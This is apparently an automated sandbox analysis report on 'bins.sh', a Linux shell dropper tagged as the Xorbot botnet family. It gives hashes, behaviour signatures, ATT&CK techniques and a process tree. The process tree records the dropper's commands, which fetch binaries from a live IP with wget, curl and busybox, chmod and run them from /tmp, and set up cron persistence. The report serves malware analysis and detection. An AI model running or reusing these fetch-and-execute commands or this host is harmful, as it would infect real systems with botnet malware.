Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
161s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/02/2025, 08:07
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
ef10152fac7e93f56a68778af04b375b
-
SHA1
4270c209c09005b135f3588743b2be59883954db
-
SHA256
09f4674d9d2939b651ef917948770c92e3466dc2a6c7c1aef1636178154cf1a4
-
SHA512
60b92d328a0130a183580bc25aa252a86534a66943b4a906f0bc3881fe8667c4270f12e7b7e9c37748512c3c620a25c4fdfbf3e4ff5aec4f606ab03772254f40
-
SSDEEP
192:S9jIb8YgcVAQQceCjhVH5J85tPhVh0Yg0AQQceCvu:SJIFVAQQceCH5K5bAQQceC2
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2138) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 678 chmod 696 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn 679 bins.sh /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf 698 bins.sh -
Renames itself 1 IoCs
pid Process 699 HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.PCvaHV crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/975/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/978/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/979/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/43/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/873/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/903/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/905/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/149/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/722/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/782/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/826/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/862/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/912/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/951/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/271/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/737/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/748/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/924/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/5/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/770/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/791/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/797/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/887/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/995/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/6/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/725/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/730/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/819/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/932/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/901/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/949/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/145/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/645/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/765/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/885/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/907/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/955/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/963/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/981/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/17/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/739/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/795/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/781/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/786/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/895/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/953/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/596/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/758/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/892/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/998/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/98/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/767/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/796/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/902/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/1000/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/757/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/863/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/filesystems crontab File opened for reading /proc/598/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/778/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/788/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/922/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf File opened for reading /proc/959/cmdline HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf wget File opened for modification /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf curl File opened for modification /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf busybox File opened for modification /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn wget File opened for modification /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn curl File opened for modification /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
PID:647 -
/bin/rm/bin/rm bins.sh2⤵PID:649
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵
- Writes file to tmp directory
PID:651
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵
- Writes file to tmp directory
PID:676
-
-
/bin/chmodchmod 777 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn./6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵PID:679
-
-
/bin/rmrm 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn2⤵PID:683
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- Writes file to tmp directory
PID:684
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox wget http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- Writes file to tmp directory
PID:693
-
-
/bin/chmodchmod 777 HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf./HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵
- Renames itself
- Reads runtime system information
PID:698 -
/bin/shsh -c "crontab -l"3⤵PID:700
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:702
-
-
-
/bin/shsh -c "crontab -"3⤵PID:703
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:705
-
-
-
-
/bin/rmrm HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf2⤵PID:718
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt2⤵PID:722
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD5f809326a9910c69f8de182c37dfec4f5
SHA1e50747c3475aa60c83c11c49357b389b053e8d68
SHA2562ec2c62082cf967eaa31b41e8554a58a3c1d5d30d8e297b684e66807b2dae37a
SHA512a0194a1a7003c0b91e6125df5579414b76a8bfa65b745aec584300b0fe640c1115000c78b5e030f6a421bbe5d929a71b92a0b61de082710115872d117dd992a5